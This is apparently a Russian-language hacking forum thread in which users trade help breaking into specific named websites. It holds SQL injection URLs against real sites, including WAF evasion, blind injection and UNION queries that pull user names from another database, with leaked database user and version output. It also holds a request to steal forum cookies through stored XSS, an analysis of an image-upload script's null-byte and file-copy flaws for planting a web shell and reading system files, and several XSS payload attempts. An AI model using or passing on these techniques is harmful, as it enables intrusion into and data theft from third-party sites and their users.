Code: http://modcos.com/news.php?id=42 нашол количество столбцов - 6 но немогу вывести названия, все что пише откидаеться и бросает на главную страницу. в чем причина?
Там WAF, на связку UNION SELECT и при встрече OR, т.е. ORDER попадает тоже под фильтр. Ну... Крути как Blind: http://modcos.com/news.php?id=42+and+substring(version(),1,1)=5 - Валидный запрос http://modcos.com/news.php?id=42+and+substring(version(),1,1)=4 - FALSE Когда запрос вовзращает TRUE, то выводятся там все комментарии. Можно раскрутить как Blind. user() \ 033038003_adminm@localhost version() \ 5.0.67-percona-highperf-b7-log database() \ babinsoft_modcos
вообщем случайно нашел активную хсс и не понимаю как сделать так что бы воровались куки на форуме Сама активка на главной странице сайта site.com Если я кину сылку на форуме (на главную страницу с хсс)..это как бы получится пасивка же..как сделать в такой ситуации что бы при просмотре темы на форуме выполнялась активка? И какой толк в таких активках, например в поле имя при регистрации итд?
reddim Больше информации тебе в этой теме ни кто не даст, читай маны. Тут всё написано http://forum.antichat.ru/thread20140.html
Подскажите почему не выводиться содержимое колонок? http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+users--
Samael91, таблица `users` находится в БД `test_base`, текущая - `zorro_feb`. Code: http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+test_base.users+limit+1,1+--+
PHP: <?php require_once "lib/JsHttpRequest.php"; function resizeimаgе($filename, $newfile, $newwidth, $newheight) { $exp=strrchr($filename, "."); list($width, $height) = getimagesize($filename); if($width > $height && $newheight < $height){ $newheight = $height / ($width / $newwidth); } else if ($width < $height && $newwidth < $width) { $newwidth = $width / ($height / $newheight); } else { $newwidth = $width; $newheight = $height; } $thumb = imagecreatetruecolor($newwidth, $newheight); if ($exp==".jpg" or $exp==".JPG" or $exp==".jpeg" or $exp==".JPEG") $source = imagecreatefromjpeg($filename); if ($exp==".png" or $exp==".PNG") $source = imagecreatefrompng($filename); if ($exp==".gif" or $exp==".GIF") $source = imagecreatefromgif($filename); imagecopyresized($thumb, $source, 0, 0, 0, 0, $newwidth, $newheight, $width, $height); imagejpeg($thumb, $newfile); return true; imagedestroy($thumb); imagedestroy($source); } $JsHttpRequest =& new JsHttpRequest("windows-1251"); include("admin/config.php"); include ("lang/".$language."/language.php"); $xxx = $_REQUEST['xxx']; $upload_url = $_REQUEST['url']; $thumb_size = $_REQUEST['thumb_size']; $upl = $_FILES['upl']; if (!is_numeric($thumb_size)) die($lerror1." <br> <a href='index.php' class='text1'>".$nazi."/a>"); if (!is_numeric($xxx) and $xxx!="") die($lerror2." <a href='index.php' class='text1'> ".$nazi."</a>"); $ext = array("jpg", "jpeg", "JPG", "JPEG", "gif", "GIF", "png", "PNG"); $file_name=$upl['name']; if ($upload_url!="") $file_name=$upload_url; if (!in_array(end(explode(".", $file_name)), $ext)) die($lerror3." <a href='index.php' class='text1'> ".$nazi."</a>"); $file_name=md5(time().rand().time()); if ($upload_url!="") $file_ext=explode(".", $upload_url); else $file_ext=explode(".", $upl['name']); if ($xxx==1) $url = $file_name."_xxx.".end($file_ext); else $url = $file_name.".".end($file_ext); $http_url = explode("/", $_SERVER['REQUEST_URI']); foreach($http_url as $key => $val) { if (end($http_url)!=$val) $http .= $val."/"; } $file_to_upload = $upl['tmp_name']; if (isset($upload_url)){ $file_to_upload = $upload_url; } include("admin/config.php"); if($js==1) { $jsc="rel='lightbox'"; } else { $jsc=""; } $http_url = "http://".$_SERVER['HTTP_HOST'].$http."upload_image/".$url; $http_thumb_url = "http://".$_SERVER['HTTP_HOST'].$http."upload_image/thumb/".$url; if (copy ($file_to_upload, "upload_image/".$url)) { resizeimаgе("upload_image/".$url, "upload_image/thumb/".$url, $thumb_size, $thumb_size) or die("Error!"); $result = "<center><p>".$lyzezagry." <br> <a href='index.php' class='text1'> ".$leve."</a></p>"; $result .= "<a ".$jsc." href='$http_url'><img src='$http_thumb_url' border=0></a><br><br>"; if ($xxx==1) $result = "<p>Изображение доступно только для лиц лет <br> <a href='index.php' class='text1'> Загрузить еще</a></p><a ".$jsc." href='$http_url'><img src='$http_thumb_url' border=0></a><br><br>"; $result .= "<font>BBCode:</font><br>"; $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"[img]".$http_url."[/img]\"><br><br>"; $result .= "<font>HTML:</font><br>"; $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"<a href='$http_url' target=_blank><img src='$http_thumb_url' border=0></a>\"><br><br>"; $result .= "<font>".$ladressiii.":</font><br>"; $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"$http_url\"><br><br> </center>"; echo $result; } else die($lerror2); ?> Скрипт заливки изображений, хочу чрез его залить шелл. Можно обойти фильтрацию?
Только вот copy до некоторых версий принимает NULL-Байт как конец строки. PHP: ... $upload_url = $_REQUEST['url']; .... $file_name=$upload_url; ... $url = $file_name.".".end($file_ext); ... copy($file_to_upload, "upload_image/".$url); ... Соответственно можно получить шелл(Если в этом каталоге запрещено выполнение PHP скриптов, можно перейти в другой.). Плюс ко всему через функцию copy можно копировать файлы не только переданные по HTTP, но и из внутренних каталогов системы. PHP: ... $upload_url = $_REQUEST['url']; .... if (isset($upload_url)){ $file_to_upload = $upload_url; } Так же тут может помочь эта уязвимость: https://forum.antichat.net/thread98525.html
как раскрутить http://www.axess-industries.com/catalog/product.php?IdCategory=14130205 ? Помогите кто в курсе)
народ такой вопрос на одном сайте нашёл уязвимость, могу вывести картинку или текст на сайт GET запросом. Но не выходит вывести ни iframe ни javascript "><script>alert()</script> - в коде отображается, но когда смотрю через Developer Tools - то вижу - <script> </script> различные варианты: <TABLE BACKGROUND="javascript:alert('Я здесь был')"> <DIV STYLE="background-image: url(javascript:alert('Я здесь был'))"> <DIV STYLE="width: expression(alert('Я здесь был '));"> так же не запускают яву, куда дальше рыть?
Если все отображается, то этого должно быть достаточно. Посмотри в исходнике, может быть нужно закрыть несколько тегов сначала, а уже потом выводить свой скрипт.
код закрыт. там в инпут идёт код: ?FPriceMin="><script>alert();</script><img%20src=" когда весь код сохраняют себе и запускаю как html - alert работает. на сайте нет, может быть защита обработки GET запросов? потому как: "><BGSOUND%20SRC="javascript:alert();"><img%20src=" через обычный просмотр кода - <BGSOUND SRC="javascript:alert();"> через Developer Tools - <bgsound src="javascript:void(0)"></bgsound>